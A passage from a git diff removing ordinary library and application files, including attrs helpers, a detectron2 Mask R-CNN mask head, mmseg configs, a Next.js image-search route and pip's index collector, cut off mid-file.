- """ - for name, value in zip(self.__slots__, state): - setattr(self, name, value) - - -_f = [ - Attribute( - name=name, - default=NOTHING, - validator=None, - repr=True, - cmp=None, - eq=True, - order=False, - hash=True, - init=True, - inherited=False, - ) - for name in Factory.__slots__ -] - -Factory = _add_hash(_add_eq(_add_repr(Factory, attrs=_f), attrs=_f), attrs=_f) - - -def make_class(name, attrs, bases=(object,), **attributes_arguments): - r""" - A quick way to create a new class called *name* with *attrs*. - - :param str name: The name for the new class. - - :param attrs: A list of names or a dictionary of mappings of names to - `attr.ib`\ s / `attrs.field`\ s. - - The order is deduced from the order of the names or attributes inside - *attrs*. Otherwise the order of the definition of the attributes is - used. - :type attrs: `list` or `dict` - - :param tuple bases: Classes that the new class will subclass. - - :param attributes_arguments: Passed unmodified to `attr.s`. - - :return: A new class with *attrs*. - :rtype: type - - .. versionadded:: 17.1.0 *bases* - .. versionchanged:: 18.1.0 If *attrs* is ordered, the order is retained. - """ - if isinstance(attrs, dict): - cls_dict = attrs - elif isinstance(attrs, (list, tuple)): - cls_dict = {a: attrib() for a in attrs} - else: - raise TypeError("attrs argument must be a dict or a list.") - - pre_init = cls_dict.pop("__attrs_pre_init__", None) - post_init = cls_dict.pop("__attrs_post_init__", None) - user_init = cls_dict.pop("__init__", None) - - body = {} - if pre_init is not None: - body["__attrs_pre_init__"] = pre_init - if post_init is not None: - body["__attrs_post_init__"] = post_init - if user_init is not None: - body["__init__"] = user_init - - type_ = types.new_class(name, bases, {}, lambda ns: ns.update(body)) - - # For pickling to work, the __module__ variable needs to be set to the - # frame where the class is created. Bypass this step in environments where - # sys._getframe is not defined (Jython for example) or sys._getframe is not - # defined for arguments greater than 0 (IronPython). - try: - type_.__module__ = sys._getframe(1).f_globals.get( - "__name__", "__main__" - ) - except (AttributeError, ValueError): - pass - - # We do it here for proper warnings with meaningful stacklevel. - cmp = attributes_arguments.pop("cmp", None) - ( - attributes_arguments["eq"], - attributes_arguments["order"], - ) = _determine_attrs_eq_order( - cmp, - attributes_arguments.get("eq"), - attributes_arguments.get("order"), - True, - ) - - return _attrs(these=cls_dict, **attributes_arguments)(type_) - - -# These are required by within this module so we define them here and merely -# import into .validators / .converters. - - -@attrs(slots=True, hash=True) -class _AndValidator: - """ - Compose many validators to a single one. - """ - - _validators = attrib() - - def __call__(self, inst, attr, value): - for v in self._validators: - v(inst, attr, value) - - -def and_(*validators): - """ - A validator that composes multiple validators into one. - - When called on a value, it runs all wrapped validators. - - :param callables validators: Arbitrary number of validators. - - .. versionadded:: 17.1.0 - """ - vals = [] - for validator in validators: - vals.extend( - validator._validators - if isinstance(validator, _AndValidator) - else [validator] - ) - - return _AndValidator(tuple(vals)) - - -def pipe(*converters): - """ - A converter that composes multiple converters into one. 
- - When called on a value, it runs all wrapped converters, returning the - *last* value. - - Type annotations will be inferred from the wrapped converters', if - they have any. - - :param callables converters: Arbitrary number of converters. - - .. versionadded:: 20.1.0 - """ - - def pipe_converter(val): - for converter in converters: - val = converter(val) - - return val - - if not converters: - # If the converter list is empty, pipe_converter is the identity. - A = typing.TypeVar("A") - pipe_converter.__annotations__ = {"val": A, "return": A} - else: - # Get parameter type from first converter. - t = _AnnotationExtractor(converters[0]).get_first_param_type() - if t: - pipe_converter.__annotations__["val"] = t - - # Get return type from last converter. - rt = _AnnotationExtractor(converters[-1]).get_return_type() - if rt: - pipe_converter.__annotations__["return"] = rt - - return pipe_converter diff --git a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/docarray/utils/_internal/progress_bar.py b/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/docarray/utils/_internal/progress_bar.py deleted file mode 100644 index 4750c509a1ade968e72c61785dd12130a03be1f2..0000000000000000000000000000000000000000 --- a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/docarray/utils/_internal/progress_bar.py +++ /dev/null @@ -1,58 +0,0 @@ -from typing import Optional - -from rich.progress import ( - BarColumn, - MofNCompleteColumn, - Progress, - SpinnerColumn, - Text, - TextColumn, - TimeElapsedColumn, - TimeRemainingColumn, -) - - -class _QPSColumn(TextColumn): - def render(self, task) -> Text: - if task.speed: - _text = f'{task.speed:.0f} QPS' - else: - _text = 'unknown' - if self.markup: - text = Text.from_markup(_text, style=self.style, justify=self.justify) - else: - text = Text(_text, style=self.style, justify=self.justify) - if self.highlighter: - self.highlighter.highlight(text) - return text - - -def _get_pbar(disable: bool, total: Optional[int] = None): - columns = ( - SpinnerColumn(), - TextColumn('[bold]{task.description}'), - BarColumn(), - MofNCompleteColumn(), - '•', - _QPSColumn('{task.speed} QPS', justify='right', style='progress.data.speed'), - '•', - TimeRemainingColumn() if total else TimeElapsedColumn(), - '•', - TextColumn( - '[bold blue]{task.fields[total_size]}', - justify='right', - style='progress.filesize', - ), - ) - - return Progress( - *columns, - transient=False, - disable=disable, - ) - - -def _get_progressbar(description: str, disable: bool, total: Optional[int]): - progress = _get_pbar(disable, total) - task = progress.add_task(description, total=total, start=False, total_size=0) - return progress, task diff --git a/spaces/Superlang/ImageProcessor/annotator/oneformer/detectron2/modeling/roi_heads/mask_head.py b/spaces/Superlang/ImageProcessor/annotator/oneformer/detectron2/modeling/roi_heads/mask_head.py deleted file mode 100644 index 1b5465e413195aa21733157af4e1ae3a2b897e7c..0000000000000000000000000000000000000000 --- a/spaces/Superlang/ImageProcessor/annotator/oneformer/detectron2/modeling/roi_heads/mask_head.py +++ /dev/null @@ -1,298 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. 
-from typing import List -import fvcore.nn.weight_init as weight_init -import torch -from torch import nn -from torch.nn import functional as F - -from annotator.oneformer.detectron2.config import configurable -from annotator.oneformer.detectron2.layers import Conv2d, ConvTranspose2d, ShapeSpec, cat, get_norm -from annotator.oneformer.detectron2.layers.wrappers import move_device_like -from annotator.oneformer.detectron2.structures import Instances -from annotator.oneformer.detectron2.utils.events import get_event_storage -from annotator.oneformer.detectron2.utils.registry import Registry - -__all__ = [ - "BaseMaskRCNNHead", - "MaskRCNNConvUpsampleHead", - "build_mask_head", - "ROI_MASK_HEAD_REGISTRY", -] - - -ROI_MASK_HEAD_REGISTRY = Registry("ROI_MASK_HEAD") -ROI_MASK_HEAD_REGISTRY.__doc__ = """ -Registry for mask heads, which predicts instance masks given -per-region features. - -The registered object will be called with `obj(cfg, input_shape)`. -""" - - -@torch.jit.unused -def mask_rcnn_loss(pred_mask_logits: torch.Tensor, instances: List[Instances], vis_period: int = 0): - """ - Compute the mask prediction loss defined in the Mask R-CNN paper. - - Args: - pred_mask_logits (Tensor): A tensor of shape (B, C, Hmask, Wmask) or (B, 1, Hmask, Wmask) - for class-specific or class-agnostic, where B is the total number of predicted masks - in all images, C is the number of foreground classes, and Hmask, Wmask are the height - and width of the mask predictions. The values are logits. - instances (list[Instances]): A list of N Instances, where N is the number of images - in the batch. These instances are in 1:1 - correspondence with the pred_mask_logits. The ground-truth labels (class, box, mask, - ...) associated with each instance are stored in fields. - vis_period (int): the period (in steps) to dump visualization. - - Returns: - mask_loss (Tensor): A scalar tensor containing the loss. - """ - cls_agnostic_mask = pred_mask_logits.size(1) == 1 - total_num_masks = pred_mask_logits.size(0) - mask_side_len = pred_mask_logits.size(2) - assert pred_mask_logits.size(2) == pred_mask_logits.size(3), "Mask prediction must be square!" 
- - gt_classes = [] - gt_masks = [] - for instances_per_image in instances: - if len(instances_per_image) == 0: - continue - if not cls_agnostic_mask: - gt_classes_per_image = instances_per_image.gt_classes.to(dtype=torch.int64) - gt_classes.append(gt_classes_per_image) - - gt_masks_per_image = instances_per_image.gt_masks.crop_and_resize( - instances_per_image.proposal_boxes.tensor, mask_side_len - ).to(device=pred_mask_logits.device) - # A tensor of shape (N, M, M), N=#instances in the image; M=mask_side_len - gt_masks.append(gt_masks_per_image) - - if len(gt_masks) == 0: - return pred_mask_logits.sum() * 0 - - gt_masks = cat(gt_masks, dim=0) - - if cls_agnostic_mask: - pred_mask_logits = pred_mask_logits[:, 0] - else: - indices = torch.arange(total_num_masks) - gt_classes = cat(gt_classes, dim=0) - pred_mask_logits = pred_mask_logits[indices, gt_classes] - - if gt_masks.dtype == torch.bool: - gt_masks_bool = gt_masks - else: - # Here we allow gt_masks to be float as well (depend on the implementation of rasterize()) - gt_masks_bool = gt_masks > 0.5 - gt_masks = gt_masks.to(dtype=torch.float32) - - # Log the training accuracy (using gt classes and 0.5 threshold) - mask_incorrect = (pred_mask_logits > 0.0) != gt_masks_bool - mask_accuracy = 1 - (mask_incorrect.sum().item() / max(mask_incorrect.numel(), 1.0)) - num_positive = gt_masks_bool.sum().item() - false_positive = (mask_incorrect & ~gt_masks_bool).sum().item() / max( - gt_masks_bool.numel() - num_positive, 1.0 - ) - false_negative = (mask_incorrect & gt_masks_bool).sum().item() / max(num_positive, 1.0) - - storage = get_event_storage() - storage.put_scalar("mask_rcnn/accuracy", mask_accuracy) - storage.put_scalar("mask_rcnn/false_positive", false_positive) - storage.put_scalar("mask_rcnn/false_negative", false_negative) - if vis_period > 0 and storage.iter % vis_period == 0: - pred_masks = pred_mask_logits.sigmoid() - vis_masks = torch.cat([pred_masks, gt_masks], axis=2) - name = "Left: mask prediction; Right: mask GT" - for idx, vis_mask in enumerate(vis_masks): - vis_mask = torch.stack([vis_mask] * 3, axis=0) - storage.put_image(name + f" ({idx})", vis_mask) - - mask_loss = F.binary_cross_entropy_with_logits(pred_mask_logits, gt_masks, reduction="mean") - return mask_loss - - -def mask_rcnn_inference(pred_mask_logits: torch.Tensor, pred_instances: List[Instances]): - """ - Convert pred_mask_logits to estimated foreground probability masks while also - extracting only the masks for the predicted classes in pred_instances. For each - predicted box, the mask of the same class is attached to the instance by adding a - new "pred_masks" field to pred_instances. - - Args: - pred_mask_logits (Tensor): A tensor of shape (B, C, Hmask, Wmask) or (B, 1, Hmask, Wmask) - for class-specific or class-agnostic, where B is the total number of predicted masks - in all images, C is the number of foreground classes, and Hmask, Wmask are the height - and width of the mask predictions. The values are logits. - pred_instances (list[Instances]): A list of N Instances, where N is the number of images - in the batch. Each Instances must have field "pred_classes". - - Returns: - None. pred_instances will contain an extra "pred_masks" field storing a mask of size (Hmask, - Wmask) for predicted class. Note that the masks are returned as a soft (non-quantized) - masks the resolution predicted by the network; post-processing steps, such as resizing - the predicted masks to the original image resolution and/or binarizing them, is left - to the caller. 
- """ - cls_agnostic_mask = pred_mask_logits.size(1) == 1 - - if cls_agnostic_mask: - mask_probs_pred = pred_mask_logits.sigmoid() - else: - # Select masks corresponding to the predicted classes - num_masks = pred_mask_logits.shape[0] - class_pred = cat([i.pred_classes for i in pred_instances]) - device = ( - class_pred.device - if torch.jit.is_scripting() - else ("cpu" if torch.jit.is_tracing() else class_pred.device) - ) - indices = move_device_like(torch.arange(num_masks, device=device), class_pred) - mask_probs_pred = pred_mask_logits[indices, class_pred][:, None].sigmoid() - # mask_probs_pred.shape: (B, 1, Hmask, Wmask) - - num_boxes_per_image = [len(i) for i in pred_instances] - mask_probs_pred = mask_probs_pred.split(num_boxes_per_image, dim=0) - - for prob, instances in zip(mask_probs_pred, pred_instances): - instances.pred_masks = prob # (1, Hmask, Wmask) - - -class BaseMaskRCNNHead(nn.Module): - """ - Implement the basic Mask R-CNN losses and inference logic described in :paper:`Mask R-CNN` - """ - - @configurable - def __init__(self, *, loss_weight: float = 1.0, vis_period: int = 0): - """ - NOTE: this interface is experimental. - - Args: - loss_weight (float): multiplier of the loss - vis_period (int): visualization period - """ - super().__init__() - self.vis_period = vis_period - self.loss_weight = loss_weight - - @classmethod - def from_config(cls, cfg, input_shape): - return {"vis_period": cfg.VIS_PERIOD} - - def forward(self, x, instances: List[Instances]): - """ - Args: - x: input region feature(s) provided by :class:`ROIHeads`. - instances (list[Instances]): contains the boxes & labels corresponding - to the input features. - Exact format is up to its caller to decide. - Typically, this is the foreground instances in training, with - "proposal_boxes" field and other gt annotations. - In inference, it contains boxes that are already predicted. - - Returns: - A dict of losses in training. The predicted "instances" in inference. - """ - x = self.layers(x) - if self.training: - return {"loss_mask": mask_rcnn_loss(x, instances, self.vis_period) * self.loss_weight} - else: - mask_rcnn_inference(x, instances) - return instances - - def layers(self, x): - """ - Neural network layers that makes predictions from input features. - """ - raise NotImplementedError - - -# To get torchscript support, we make the head a subclass of `nn.Sequential`. -# Therefore, to add new layers in this head class, please make sure they are -# added in the order they will be used in forward(). -@ROI_MASK_HEAD_REGISTRY.register() -class MaskRCNNConvUpsampleHead(BaseMaskRCNNHead, nn.Sequential): - """ - A mask head with several conv layers, plus an upsample layer (with `ConvTranspose2d`). - Predictions are made with a final 1x1 conv layer. - """ - - @configurable - def __init__(self, input_shape: ShapeSpec, *, num_classes, conv_dims, conv_norm="", **kwargs): - """ - NOTE: this interface is experimental. - - Args: - input_shape (ShapeSpec): shape of the input feature - num_classes (int): the number of foreground classes (i.e. background is not - included). 1 if using class agnostic prediction. - conv_dims (list[int]): a list of N>0 integers representing the output dimensions - of N-1 conv layers and the last upsample layer. - conv_norm (str or callable): normalization for the conv layers. - See :func:`detectron2.layers.get_norm` for supported types. - """ - super().__init__(**kwargs) - assert len(conv_dims) >= 1, "conv_dims have to be non-empty!" 
- - self.conv_norm_relus = [] - - cur_channels = input_shape.channels - for k, conv_dim in enumerate(conv_dims[:-1]): - conv = Conv2d( - cur_channels, - conv_dim, - kernel_size=3, - stride=1, - padding=1, - bias=not conv_norm, - norm=get_norm(conv_norm, conv_dim), - activation=nn.ReLU(), - ) - self.add_module("mask_fcn{}".format(k + 1), conv) - self.conv_norm_relus.append(conv) - cur_channels = conv_dim - - self.deconv = ConvTranspose2d( - cur_channels, conv_dims[-1], kernel_size=2, stride=2, padding=0 - ) - self.add_module("deconv_relu", nn.ReLU()) - cur_channels = conv_dims[-1] - - self.predictor = Conv2d(cur_channels, num_classes, kernel_size=1, stride=1, padding=0) - - for layer in self.conv_norm_relus + [self.deconv]: - weight_init.c2_msra_fill(layer) - # use normal distribution initialization for mask prediction layer - nn.init.normal_(self.predictor.weight, std=0.001) - if self.predictor.bias is not None: - nn.init.constant_(self.predictor.bias, 0) - - @classmethod - def from_config(cls, cfg, input_shape): - ret = super().from_config(cfg, input_shape) - conv_dim = cfg.MODEL.ROI_MASK_HEAD.CONV_DIM - num_conv = cfg.MODEL.ROI_MASK_HEAD.NUM_CONV - ret.update( - conv_dims=[conv_dim] * (num_conv + 1), # +1 for ConvTranspose - conv_norm=cfg.MODEL.ROI_MASK_HEAD.NORM, - input_shape=input_shape, - ) - if cfg.MODEL.ROI_MASK_HEAD.CLS_AGNOSTIC_MASK: - ret["num_classes"] = 1 - else: - ret["num_classes"] = cfg.MODEL.ROI_HEADS.NUM_CLASSES - return ret - - def layers(self, x): - for layer in self: - x = layer(x) - return x - - -def build_mask_head(cfg, input_shape): - """ - Build a mask head defined by `cfg.MODEL.ROI_MASK_HEAD.NAME`. - """ - name = cfg.MODEL.ROI_MASK_HEAD.NAME - return ROI_MASK_HEAD_REGISTRY.get(name)(cfg, input_shape) diff --git a/spaces/Superlang/ImageProcessor/annotator/uniformer/configs/_base_/schedules/schedule_20k.py b/spaces/Superlang/ImageProcessor/annotator/uniformer/configs/_base_/schedules/schedule_20k.py deleted file mode 100644 index bf780a1b6f6521833c6a5859675147824efa599d..0000000000000000000000000000000000000000 --- a/spaces/Superlang/ImageProcessor/annotator/uniformer/configs/_base_/schedules/schedule_20k.py +++ /dev/null @@ -1,9 +0,0 @@ -# optimizer -optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0005) -optimizer_config = dict() -# learning policy -lr_config = dict(policy='poly', power=0.9, min_lr=1e-4, by_epoch=False) -# runtime settings -runner = dict(type='IterBasedRunner', max_iters=20000) -checkpoint_config = dict(by_epoch=False, interval=2000) -evaluation = dict(interval=2000, metric='mIoU') diff --git a/spaces/Superlang/ImageProcessor/annotator/uniformer/mmseg/datasets/chase_db1.py b/spaces/Superlang/ImageProcessor/annotator/uniformer/mmseg/datasets/chase_db1.py deleted file mode 100644 index 8bc29bea14704a4407f83474610cbc3bef32c708..0000000000000000000000000000000000000000 --- a/spaces/Superlang/ImageProcessor/annotator/uniformer/mmseg/datasets/chase_db1.py +++ /dev/null @@ -1,27 +0,0 @@ -import os.path as osp - -from .builder import DATASETS -from .custom import CustomDataset - - -@DATASETS.register_module() -class ChaseDB1Dataset(CustomDataset): - """Chase_db1 dataset. - - In segmentation map annotation for Chase_db1, 0 stands for background, - which is included in 2 categories. ``reduce_zero_label`` is fixed to False. - The ``img_suffix`` is fixed to '.png' and ``seg_map_suffix`` is fixed to - '_1stHO.png'. 
- """ - - CLASSES = ('background', 'vessel') - - PALETTE = [[120, 120, 120], [6, 230, 230]] - - def __init__(self, **kwargs): - super(ChaseDB1Dataset, self).__init__( - img_suffix='.png', - seg_map_suffix='_1stHO.png', - reduce_zero_label=False, - **kwargs) - assert osp.exists(self.img_dir) diff --git a/spaces/TNR-5/semantic-image-search.img/src/app/search/route.js b/spaces/TNR-5/semantic-image-search.img/src/app/search/route.js deleted file mode 100644 index 4961ecfd132d0e092c7eca985893e9da745bcbf4..0000000000000000000000000000000000000000 --- a/spaces/TNR-5/semantic-image-search.img/src/app/search/route.js +++ /dev/null @@ -1,73 +0,0 @@ -// Create a custom request handler for the /classify route. -// For more information, see https://nextjs.org/docs/app/building-your-application/routing/router-handlers - -import { NextResponse } from 'next/server' -import ApplicationSingleton from '../app.js' - -const parseInputs = (searchParams) => { - const text = searchParams.get('text'); - if (!text) { - return { - error: 'Missing text parameter', - }; - } - const threshold = searchParams.get('threshold'); - const match_threshold = Number(threshold ?? 0.1); - if (isNaN(match_threshold) || match_threshold < 0 || match_threshold > 1) { - return { - error: `Invalid threshold parameter "${threshold}" (should be a number between 0 and 1)`, - }; - } - - const limit = searchParams.get('limit'); - const match_count = Number(limit ?? 25); - if (isNaN(match_count) || !Number.isInteger(match_count) || match_count < 0 || match_count > 1000) { - return { - error: `Invalid limit parameter "${limit}" (should be an integer between 0 and 1000)`, - }; - } - - return { text, match_threshold, match_count } -} - -// TODO: add caching - -export async function GET(request) { - const parsedInputs = parseInputs(request.nextUrl.searchParams); - if (parsedInputs.error) { - return NextResponse.json({ - error: parsedInputs.error, - }, { status: 400 }); - } - - // Valid inputs, so we can proceed - const { text, match_threshold, match_count } = parsedInputs; - - // Get the tokenizer, model, and database singletons. When called for the first time, - // this will load the models and cache them for future use. - const [tokenizer, text_model, database] = await ApplicationSingleton.getInstance(); - - // Run tokenization - let text_inputs = tokenizer(text, { padding: true, truncation: true }); - - // Compute embeddings - const { text_embeds } = await text_model(text_inputs); - const query_embedding = text_embeds.tolist()[0]; - - // TODO add pagination? 
- let { data: images, error } = await database - .rpc('match_images', { - query_embedding, - match_threshold, - match_count, - }); - if (error) { - console.warn('Error fetching images', error); - return NextResponse.json({ - error: 'An error occurred while fetching images', - }, { status: 500 }); - } - - - return NextResponse.json(images); -} diff --git a/spaces/TandCAcceptMe/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_internal/index/__init__.py b/spaces/TandCAcceptMe/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_internal/index/__init__.py deleted file mode 100644 index 7a17b7b3b6ad49157ee41f3da304fec3d32342d3..0000000000000000000000000000000000000000 --- a/spaces/TandCAcceptMe/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_internal/index/__init__.py +++ /dev/null @@ -1,2 +0,0 @@ -"""Index interaction code -""" diff --git a/spaces/TandCAcceptMe/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_internal/index/collector.py b/spaces/TandCAcceptMe/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_internal/index/collector.py deleted file mode 100644 index b3e293ea3a508dc54674349e845f9794118f548b..0000000000000000000000000000000000000000 --- a/spaces/TandCAcceptMe/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_internal/index/collector.py +++ /dev/null @@ -1,505 +0,0 @@ -""" -The main purpose of this module is to expose LinkCollector.collect_sources(). -""" - -import collections -import email.message -import functools -import itertools -import json -import logging -import os -import urllib.parse -import urllib.request -from html.parser import HTMLParser -from optparse import Values -from typing import ( - TYPE_CHECKING, - Callable, - Dict, - Iterable, - List, - MutableMapping, - NamedTuple, - Optional, - Sequence, - Tuple, - Union, -) - -from pip._vendor import requests -from pip._vendor.requests import Response -from pip._vendor.requests.exceptions import RetryError, SSLError - -from pip._internal.exceptions import NetworkConnectionError -from pip._internal.models.link import Link -from pip._internal.models.search_scope import SearchScope -from pip._internal.network.session import PipSession -from pip._internal.network.utils import raise_for_status -from pip._internal.utils.filetypes import is_archive_file -from pip._internal.utils.misc import redact_auth_from_url -from pip._internal.vcs import vcs - -from .sources import CandidatesFromPage, LinkSource, build_source - -if TYPE_CHECKING: - from typing import Protocol -else: - Protocol = object - -logger = logging.getLogger(__name__) - -ResponseHeaders = MutableMapping[str, str] - - -def _match_vcs_scheme(url: str) -> Optional[str]: - """Look for VCS schemes in the URL. - - Returns the matched VCS scheme, or None if there's no match. - """ - for scheme in vcs.schemes: - if url.lower().startswith(scheme) and url[len(scheme)] in "+:": - return scheme - return None - - -class _NotAPIContent(Exception): - def __init__(self, content_type: str, request_desc: str) -> None: - super().__init__(content_type, request_desc) - self.content_type = content_type - self.request_desc = request_desc - - -def _ensure_api_header(response: Response) -> None: - """ - Check the Content-Type header to ensure the response contains a Simple - API Response. - - Raises `_NotAPIContent` if the content type is not a valid content-type. 
- """ - content_type = response.headers.get("Content-Type", "Unknown") - - content_type_l = content_type.lower() - if content_type_l.startswith( - ( - "text/html", - "application/vnd.pypi.simple.v1+html", - "application/vnd.pypi.simple.v1+json", - ) - ): - return - - raise _NotAPIContent(content_type, response.request.method) - - -class _NotHTTP(Exception): - pass - - -def _ensure_api_response(url: str, session: PipSession) -> None: - """ - Send a HEAD request to the URL, and ensure the response contains a simple - API Response. - - Raises `_NotHTTP` if the URL is not available for a HEAD request, or - `_NotAPIContent` if the content type is not a valid content type. - """ - scheme, netloc, path, query, fragment = urllib.parse.urlsplit(url) - if scheme not in {"http", "https"}: - raise _NotHTTP() - - resp = session.head(url, allow_redirects=True) - raise_for_status(resp) - - _ensure_api_header(resp) - - -def _get_simple_response(url: str, session: PipSession) -> Response: - """Access an Simple API response with GET, and return the response. - - This consists of three parts: - - 1. If the URL looks suspiciously like an archive, send a HEAD first to - check the Content-Type is HTML or Simple API, to avoid downloading a - large file. Raise `_NotHTTP` if the content type cannot be determined, or - `_NotAPIContent` if it is not HTML or a Simple API. - 2. Actually perform the request. Raise HTTP exceptions on network failures. - 3. Check the Content-Type header to make sure we got a Simple API response, - and raise `_NotAPIContent` otherwise. - """ - if is_archive_file(Link(url).filename): - _ensure_api_response(url, session=session) - - logger.debug("Getting page %s", redact_auth_from_url(url)) - - resp = session.get( - url, - headers={ - "Accept": ", ".join( - [ - "application/vnd.pypi.simple.v1+json", - "application/vnd.pypi.simple.v1+html; q=0.1", - "text/html; q=0.01", - ] - ), - # We don't want to blindly returned cached data for - # /simple/, because authors generally expecting that - # twine upload && pip install will function, but if - # they've done a pip install in the last ~10 minutes - # it won't. Thus by setting this to zero we will not - # blindly use any cached data, however the benefit of - # using max-age=0 instead of no-cache, is that we will - # still support conditional requests, so we will still - # minimize traffic sent in cases where the page hasn't - # changed at all, we will just always incur the round - # trip for the conditional GET now instead of only - # once per 10 minutes. - # For more information, please see pypa/pip#5670. - "Cache-Control": "max-age=0", - }, - ) - raise_for_status(resp) - - # The check for archives above only works if the url ends with - # something that looks like an archive. However that is not a - # requirement of an url. Unless we issue a HEAD request on every - # url we cannot know ahead of time for sure if something is a - # Simple API response or not. However we can check after we've - # downloaded it. 
- _ensure_api_header(resp) - - logger.debug( - "Fetched page %s as %s", - redact_auth_from_url(url), - resp.headers.get("Content-Type", "Unknown"), - ) - - return resp - - -def _get_encoding_from_headers(headers: ResponseHeaders) -> Optional[str]: - """Determine if we have any encoding information in our headers.""" - if headers and "Content-Type" in headers: - m = email.message.Message() - m["content-type"] = headers["Content-Type"] - charset = m.get_param("charset") - if charset: - return str(charset) - return None - - -class CacheablePageContent: - def __init__(self, page: "IndexContent") -> None: - assert page.cache_link_parsing - self.page = page - - def __eq__(self, other: object) -> bool: - return isinstance(other, type(self)) and self.page.url == other.page.url - - def __hash__(self) -> int: - return hash(self.page.url) - - -class ParseLinks(Protocol): - def __call__(self, page: "IndexContent") -> Iterable[Link]: - ... - - -def with_cached_index_content(fn: ParseLinks) -> ParseLinks: - """ - Given a function that parses an Iterable[Link] from an IndexContent, cache the - function's result (keyed by CacheablePageContent), unless the IndexContent - `page` has `page.cache_link_parsing == False`. - """ - - @functools.lru_cache(maxsize=None) - def wrapper(cacheable_page: CacheablePageContent) -> List[Link]: - return list(fn(cacheable_page.page)) - - @functools.wraps(fn) - def wrapper_wrapper(page: "IndexContent") -> List[Link]: - if page.cache_link_parsing: - return wrapper(CacheablePageContent(page)) - return list(fn(page)) - - return wrapper_wrapper - - -@with_cached_index_content -def parse_links(page: "IndexContent") -> Iterable[Link]: - """ - Parse a Simple API's Index Content, and yield its anchor elements as Link objects. - """ - - content_type_l = page.content_type.lower() - if content_type_l.startswith("application/vnd.pypi.simple.v1+json"): - data = json.loads(page.content) - for file in data.get("files", []): - link = Link.from_json(file, page.url) - if link is None: - continue - yield link - return - - parser = HTMLLinkParser(page.url) - encoding = page.encoding or "utf-8" - parser.feed(page.content.decode(encoding)) - - url = page.url - base_url = parser.base_url or url - for anchor in parser.anchors: - link = Link.from_element(anchor, page_url=url, base_url=base_url) - if link is None: - continue - yield link - - -class IndexContent: - """Represents one response (or page), along with its URL""" - - def __init__( - self, - content: bytes, - content_type: str, - encoding: Optional[str], - url: str, - cache_link_parsing: bool = True, - ) -> None: - """ - :param encoding: the encoding to decode the given content. - :param url: the URL from which the HTML was downloaded. - :param cache_link_parsing: whether links parsed from this page's url - should be cached. PyPI index urls should - have this set to False, for example. - """ - self.content = content - self.content_type = content_type - self.encoding = encoding - self.url = url - self.cache_link_parsing = cache_link_parsing - - def __str__(self) -> str: - return redact_auth_from_url(self.url) - - -class HTMLLinkParser(HTMLParser): - """ - HTMLParser that keeps the first base HREF and a list of all anchor - elements' attributes. 
- """ - - def __init__(self, url: str) -> None: - super().__init__(convert_charrefs=True) - - self.url: str = url - self.base_url: Optional[str] = None - self.anchors: List[Dict[str, Optional[str]]] = [] - - def handle_starttag(self, tag: str, attrs: List[Tuple[str, Optional[str]]]) -> None: - if tag == "base" and self.base_url is None: - href = self.get_href(attrs) - if href is not None: - self.base_url = href - elif tag == "a": - self.anchors.append(dict(attrs)) - - def get_href(self, attrs: List[Tuple[str, Optional[str]]]) -> Optional[str]: - for name, value in attrs: - if name == "href": - return value - return None - - -def _handle_get_simple_fail( - link: Link, - reason: Union[str, Exception], - meth: Optional[Callable[..., None]] = None, -) -> None: - if meth is None: - meth = logger.debug - meth("Could not fetch URL %s: %s - skipping", link, reason) - - -def _make_index_content( - response: Response, cache_link_parsing: bool = True -) -> IndexContent: - encoding = _get_encoding_from_headers(response.headers) - return IndexContent( - response.content, - response.headers["Content-Type"], - encoding=encoding, - url=response.url, - cache_link_parsing=cache_link_parsing, - ) - - -def _get_index_content(link: Link, *, session: PipSession) -> Optional["IndexContent"]: - url = link.url.split("#", 1)[0] - - # Check for VCS schemes that do not support lookup as web pages. - vcs_scheme = _match_vcs_scheme(url) - if vcs_scheme: - logger.warning( - "Cannot look at %s URL %s because it does not support lookup as web pages.", - vcs_scheme, - link, - ) - return None - - # Tack index.html onto file:// URLs that point to directories - scheme, _, path, _, _, _ = urllib.parse.urlparse(url) - if scheme == "file" and os.path.isdir(urllib.request.url2pathname(path)): - # add trailing slash if not present so urljoin doesn't trim - # final segment - if not url.endswith("/"): - url += "/" - # TODO: In the future, it would be nice if pip supported PEP 691 - # style responses in the file:// URLs, however there's no - # standard file extension for application/vnd.pypi.simple.v1+json - # so we'll need to come up with something on our own. - url = urllib.parse.urljoin(url, "index.html") - logger.debug(" file: URL is directory, getting %s", url) - - try: - resp = _get_simple_response(url, session=session) - except _NotHTTP: - logger.warning( - "Skipping page %s because it looks like an archive, and cannot " - "be checked by a HTTP HEAD request.", - link, - ) - except _NotAPIContent as exc: - logger.warning( - "Skipping page %s because the %s request got Content-Type: %s. 
" - "The only supported Content-Types are application/vnd.pypi.simple.v1+json, " - "application/vnd.pypi.simple.v1+html, and text/html", - link, - exc.request_desc, - exc.content_type, - ) - except NetworkConnectionError as exc: - _handle_get_simple_fail(link, exc) - except RetryError as exc: - _handle_get_simple_fail(link, exc) - except SSLError as exc: - reason = "There was a problem confirming the ssl certificate: " - reason += str(exc) - _handle_get_simple_fail(link, reason, meth=logger.info) - except requests.ConnectionError as exc: - _handle_get_simple_fail(link, f"connection error: {exc}") - except requests.Timeout: - _handle_get_simple_fail(link, "timed out") - else: - return _make_index_content(resp, cache_link_parsing=link.cache_link_parsing) - return None - - -class CollectedSources(NamedTuple): - find_links: Sequence[Optional[LinkSource]] - index_urls: Sequence[Optional[LinkSource]] - - -class LinkCollector: - - """ - Responsible for collecting Link objects from all configured locations, - making network requests as needed. - - The class's main method is its collect_sources() method. - """ - - def __init__( - self, - session: PipSession, - search_scope: SearchScope, - ) -> None: - self.search_scope = search_scope - self.session = session - - @classmethod - def create( - cls, - session: PipSession, - options: Values, - suppress_no_index: bool = False, - ) -> "LinkCollector": - """ - :param session: The Session to use to make requests. - :param suppress_no_index: Whether to ignore the --no-index option - when constructing the SearchScope object. - """ - index_urls = [options.index_url] + options.extra_index_urls - if options.no_index and not suppress_no_index: - logger.debug( - "Ignoring indexes: %s", - ",".join(redact_auth_from_url(url) for url in index_urls), - ) - index_urls = [] - - # Make sure find_links is a list 